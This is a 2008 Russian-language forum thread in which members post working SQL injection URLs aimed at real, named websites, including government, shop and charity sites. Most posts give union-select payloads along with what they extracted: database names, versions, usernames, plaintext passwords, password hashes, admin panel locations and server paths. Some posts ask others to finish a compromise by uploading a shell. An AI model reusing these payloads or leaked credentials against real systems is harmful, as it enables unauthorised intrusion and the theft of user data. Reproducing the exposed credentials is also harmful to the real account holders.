SQL Инъекции

$n@ke · 11 Aug 2008

http://www.aliyahjobcenter.org/page.php?id=50[SQL]
Click to expand...

DBname: israemploy
User: israemploy@localhost
Version: 5.0.45-log

user
id:loginassword:userTypeermissionLevel
1:yisrael:w3X-5j4Qrogrammer:3
2:danbarry*4t7r9~a$rogrammer:3
3:isaac:issacrogrammer:3
4:macron:n<5f3r8&K+:Regular:3
5:lubrob:w$2u5m9#G*:Regular:3
8:test:test:Regular:3
Click to expand...

админку не нашол(( кто найдет - в личку плз.

Calcutta · 11 Aug 2008

http://crimeahouse.ru/index.php?pageId=24&id=-111+union+select+1,2,3,4,5,concat_ws(0x3a,user(),version(),database()),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57--
crimeahouseru@localhost:5.0.26-log:dbm_www_crimeahouse_ru

http://crimeahouse.ru/index.php?pageId=24&id=-111+union+select+1,2,3,4,5,mail,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57+from+mail+limit+723,1--
мыльники - самое интересное, что можно вытащить, кажется >_>
________________

http://www.makc-m.nnov.ru/faq.php?id_faq=-155+union+select+1,2,3,4,5
http://www.makc-m.nnov.ru/faq.php?id_faq=-155+union+select+1,table_name,3,4,5+from+information_schema.tables+limit+0,1--
Code:
SELECT * FROM faq WHERE id_faq=-155 union select 1,table_name,3,4,5 from information_schema.tables limit 0,1--
Error: SELECT command denied to user 'makcm'@'localhost' for table 'tables'
К сожалению, сервис Вопрос-Ответ недоступен

Momiji · 11 Aug 2008

fabbrigroup.com
Code:
http://www.fabbrigroup.com/rides.php?cat=-9+union+select+concat(0x3,version())/*
5.0.45fabbrigroup_com@localhostfabbrigroup_com
Code:
http://www.fabbrigroup.com/rides.php?cat=-9+union+select+password+from+fabbrigroup_users+limit+0,1/*
admin:aec5dd86377b6754b9509a775a0e2a26:ruotino

MirA · 11 Aug 2008

http://www.realestate.com.pr
5 ветка

http://www.realestate.com.pr/sale/?pueblo=52+and+5=substring((version()),1,1)&town=Morovis&state=Puerto%20Rico
Click to expand...

админку не нашел..

http://www.pumpi.com.mk
version = 4

http://www.pumpi.com.mk/NewsSingle.php?id=-5+union+select+1,version()
Click to expand...

forbidden http://www.pumpi.com.mk/admin/

http://www.pumpi.com.mk
version = 4

http://www.sankeram.com.mk/content.php?id=11+and+4=substring(version(),1,1)
Click to expand...

http://www.nibm.com.mk
4 ветка

http://www.nibm.com.mk/content.php?id=23+and+4=substring((version()),1,1)
Click to expand...

админка

http://www.sport.gov.mo
4 version
есть табличка users c полями username,password

http://www.sport.gov.mo/web/pt/aviso/details.php?id=-1331+union+select+1,concat_ws(0x3a3a3a,username,password),3,4+from+users+limit+0,1/*
Click to expand...

username = cat
password = catch
только вот не подходят они...(

http://www.uni-care.com.mo

5 ветка

http://www.uni-care.com.mo/info_detail.php?id=-9+union+select+1,version(),3,4,5/*
Click to expand...

директория C:\Inetpub\vhosts\uni-care.com.mo\httpdocs\info_detail.php

http://www.cpttm.org.mo

4 ветка

http://www.cpttm.org.mo/news_e.php?id=-56+union+select+1,2,3,4,5,unhex(hex(version())),7,8,9,10,11,12,13,14,15,16/*
Click to expand...

директория D:\wwwroot2\news.php

http://www.lev.me

version() = 4.0.27-max-log

http://www.lev.me/comments.php?id=-84+union+select+1,2,3,4,version(),6,7/*
Click to expand...

$n@ke · 12 Aug 2008

http://www.congress.gov.ph/press/details.php?pressid=-2528
Click to expand...

1,2,3,4,5,6,7,8

User:[email protected]
Database:congres_hrep
Version:4.0.24_Debian-10sarge2-log

Calcutta · 12 Aug 2008

http://fastflowerstoukraine.com/index.php?pageid=5+union+select+1,2,3,4,5,6,7,8,9,10,11,12--
кто раскрутит до конца?

http://schalter.ru/page.php?id_level=

nicusor · 12 Aug 2008

Calcutta said:

http://fastflowerstoukraine.com/index.php?pageid=5+union+select+1,2,3,4,5,6,7,8,9,10,11,12--
кто раскрутит до конца?

http://schalter.ru/page.php?id_level=
Click to expand...

обходим гору

http://fastflowerstoukraine.com/local/plug-in/a-price/showone.php?id=-1+union+select+1,2,3,4,5,concat_ws(0x3a,user(),version(),database()),7,8,9,10,11,12,13,14,15,16,17/*

Calcutta · 12 Aug 2008

nicusor said:

обходим гору

http://fastflowerstoukraine.com/local/plug-in/a-price/showone.php?id=-1+union+select+1,2,3,4,5,concat_ws(0x3a,user(),version(),database()),7,8,9,10,11,12,13,14,15,16,17/*
Click to expand...

http://fastflowerstoukraine.com/local/plug-in/a-price/showone.php?id=-1+union+select+1,2,3,4,5,concat_ws(0x3a,table_name),7,8,9,10,11,12,13,14,15,16,17+from+information_schema.tables+limit+0,1/**
а дальше?

$n@ke · 12 Aug 2008

http://www.lvif.gov.lv/?object_id=-376[sql]
Click to expand...

Dbname: videsinvfonds
Version: 5.0.24
User:videsinvfonds@localhost

логиниться - нелогинится..продолжение в админках)

nicusor · 12 Aug 2008

Calcutta said:

http://fastflowerstoukraine.com/local/plug-in/a-price/showone.php?id=-1+union+select+1,2,3,4,5,concat_ws(0x3a,table_name),7,8,9,10,11,12,13,14,15,16,17+from+information_schema.tables+limit+0,1/**
а дальше?
Click to expand...

переходим в Ваши вопросы по уязвимостям. https://forum.antichat.ru/lastpostinthread46016.html

Momiji · 12 Aug 2008

therapyshoppe.com
Code:
http://www.therapyshoppe.com/product.php?cat=-8+union+select+1,concat_ws(0x3a3a,version(),user(),database())/*
5.0.45-log::[email protected]::therapyshoppe
Code:
http://www.therapyshoppe.com/product.php?cat=-8+union+select+1,concat(table_name,0x3a3a3a,table_schema)+from+information_schema.tables+limit+20,1/*
Список таблиц:
Code:
categories
descriptions
products
specials
Собственно нечего интересного(

luz3r · 12 Aug 2008

http://www.cageprisoners.com/
HTML:
http://www.cageprisoners.com/articles.php?id=25632'+order+by+6/*
Кол-во столбцов =6
HTML:
http://www.cageprisoners.com/articles.php?id=-25632+union+select+1,2,3,4,5,6/*
version : 5.0.45
database : cagepris_cms
user : cagepris_cms@localhost
HTML:
http://www.cageprisoners.com/articles.php?id=-25632+union+select+1,2,table_name,4,5,6+from+information_schema.tables+limit+17,10/*
Таблица - admins

Хеш пароля : QYYoUiD1cbIlTi2jPbgoQ0

Админка:
HTML:
http://www.cageprisoners.com/admin/login.php?accessdenied=%2Fadmin%2F
P.S. Подскажите что за вид хеша!?

MirA · 12 Aug 2008

http://allmitino.ru
5-ая ветка

http://allmitino.ru/catalog/responses/?org_id=-1690+union+select+1,2,3,4,5,6,7,version(),9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31
Click to expand...

есть таблички phpbb_users,allm_admin,allm_users

админка

katie:::03e682cf75e3b31d
kirill:::10edb41c7e718497

пароли вроде шифровались mysql

BanQui · 12 Aug 2008

Люди посматрите пожалуйста ентот сайт http://pw.spark-games.ru/indexx.php (попрошу обратить внимание на мини чат!) Вот регистрация тоже не понятно http://pw.spark-games.ru/registration.php попробуйте зарегить новый акк есть ошибки скульные!

$n@ke · 13 Aug 2008

PR-6 от гарварда сайтек какой-то.

http://www.pluralism.org/news/article.php?id=10536
Click to expand...

42
name[email protected]
Version:4.1.20-log
Dbname:news

t0ox · 13 Aug 2008

Code:

http://www.hq-video.ru/details.php?id=-999999+union+select+1,2,concat(version(),0x3a,user (),0x3a,database()),4,5/*

5.0.26
root@localhost
hqvideo

Code:

http://www.hq-video.ru/details.php?id=-999999+union+select+1,2,concat(table_schema,0x3a,t able_name,0x3a,column_name),4,5+from+information_s chema.columns/*
http://www.hq-video.ru/details.php?id=-999999+union+select+1,2,concat(table_name,0x3a,col umn_name),4,5+from+information_schema.columns/*

кто шэл зальёт опешитесь

PandoraBox · 13 Aug 2008

Code:

http://www.profvideo.ru/index.php?ids=-501+union+select+1,2,version(),concat_ws(0x3a3a,user(),database()),5,6,7,8,9,10,11,12/*

4.1.22
profvideo@localhost
profvideo

Glazz · 13 Aug 2008

BanQui said:

Люди посматрите пожалуйста ентот сайт http://pw.spark-games.ru/indexx.php (попрошу обратить внимание на мини чат!) Вот регистрация тоже не понятно http://pw.spark-games.ru/registration.php попробуйте зарегить новый акк есть ошибки скульные!
Click to expand...

Ошибки при реге , это у них SQL сервер недоступен/орублен.

Calcutta · 13 Aug 2008

Интернет-магазин:
http://webkoleso.ru/index.php?pageId=-111111+union+select+1,2,3,concat_ws(0x3a,user(),version(),database()),5,6,7,8,9--
_________________________________________
edited:
http://magazine.ge/index.php?page=events&id=22+union+select+1,2,3,4,5,6,7,8,9--

http://svrwheels.ru/index.php?pageId=-111+union+select+1,2,3,4,5,6,7,8--

http://ihf-hr.org/documents/doc_summary.php?sec_id=1+union+select+1,concat_ws(0x3a,version(),user(),database()),3-- <<<----с дальнейшим выводом проблемы :-/

S0ulVortex · 13 Aug 2008

Code:

http://vesnasouvenir.com.ua/line2.php?lng=ru&art=16+limit+0+union+select+1,2,concat_ws(0x3a3a,us er_login,user_passw),4,5,6,7+from+auth_users+limit+3,10/*&cat=2
http://trol.com.ua/line2.php?lng=ru&art=16+limit+0+union+select+1,2,concat_ws(0x3a3a,us er_login,user_passw),4,5,6,7+from+auth_users+limit+3,10/*&cat=2
http://expoland.com.ua/line2.php?lng=ru&art=16+limit+0+union+select+1,2,concat_ws(0x3a3a,us er_login,user_passw),4,5,6,7+from+auth_users+limit+3,10/*&cat=2
http://vesnaboard.com.ua/line2.php?lng=ru&art=16+limit+0+union+select+1,2,concat_ws(0x3a3a,us er_login,user_passw),4,5,6,7+from+auth_users+limit+3,10/*&cat=2
http://www.eva.dp.ua/line2.php?lng=ru&art=16+limit+0+union+select+1,2,concat_ws(0x3a3a,us er_login,user_passw),4,5,6,7+from+auth_users+limit+3,10/*&cat=2
http://www.cifrotech.com.ua/line2.php?lng=ru&art=16+limit+0+union+select+1,2,concat_ws(0x3a3a,us er_login,user_passw),4,5,6,7+from+auth_users+limit+3,10/*&cat=2
http://ops-print.com.ua/line2.php?lng=ru&art=16+limit+0+union+select+1,2,concat_ws(0x3a3a,us er_login,user_passw),4,5,6,7+from+auth_users+limit+3,10/*&cat=2
http://vesnanaruzhka.com.ua/line2.php?lng=ru&art=16+limit+0+union+select+1,2,concat_ws(0x3a3a,us er_login,user_passw),4,5,6,7+from+auth_users+limit+3,10/*&cat=2
http://vp.com.ua/line2.php?lng=ru&art=16+limit+0+union+select+1,2,concat_ws(0x3a3a,us er_login,user_passw),4,5,6,7+from+auth_users+limit+3,10/*&cat=2
http://www.kominmet.com.ua/line2.php?lng=ru&art=16+limit+0+union+select+1,2,concat_ws(0x3a3a,us er_login,user_passw),4,5,6,7+from+auth_users+limit+3,10/*&cat=2
http://piton.com.ua/line2.php?lng=ru&art=16+limit+0+union+select+1,2,concat_ws(0x3a3a,us er_login,user_passw),4,5,6,7+from+auth_users+limit+3,10/*&cat=2

Все сайты управляются отсюда
http://www.as-admin.com/index.php
Жаль такого на юкоз нету

SQL Инъекции

$n@ke Elder - Старейшина

Calcutta Elder - Старейшина

Momiji Elder - Старейшина

MirA Member

$n@ke Elder - Старейшина

Calcutta Elder - Старейшина

nicusor Elder - Старейшина

Calcutta Elder - Старейшина

$n@ke Elder - Старейшина

nicusor Elder - Старейшина

Momiji Elder - Старейшина

luz3r Banned

MirA Member

BanQui Elder - Старейшина

$n@ke Elder - Старейшина

t0ox Member

PandoraBox Elder - Старейшина

Glazz Elder - Старейшина

Calcutta Elder - Старейшина

S0ulVortex Elder - Старейшина

Useful Searches

SQL Инъекции

$n@ke Elder - Старейшина

Calcutta Elder - Старейшина

Momiji Elder - Старейшина

MirA Member

$n@ke Elder - Старейшина

Calcutta Elder - Старейшина

nicusor Elder - Старейшина

Calcutta Elder - Старейшина

$n@ke Elder - Старейшина

nicusor Elder - Старейшина

Momiji Elder - Старейшина

luz3r Banned

MirA Member

BanQui Elder - Старейшина

$n@ke Elder - Старейшина

t0ox Member

PandoraBox Elder - Старейшина

Glazz Elder - Старейшина

Calcutta Elder - Старейшина

S0ulVortex Elder - Старейшина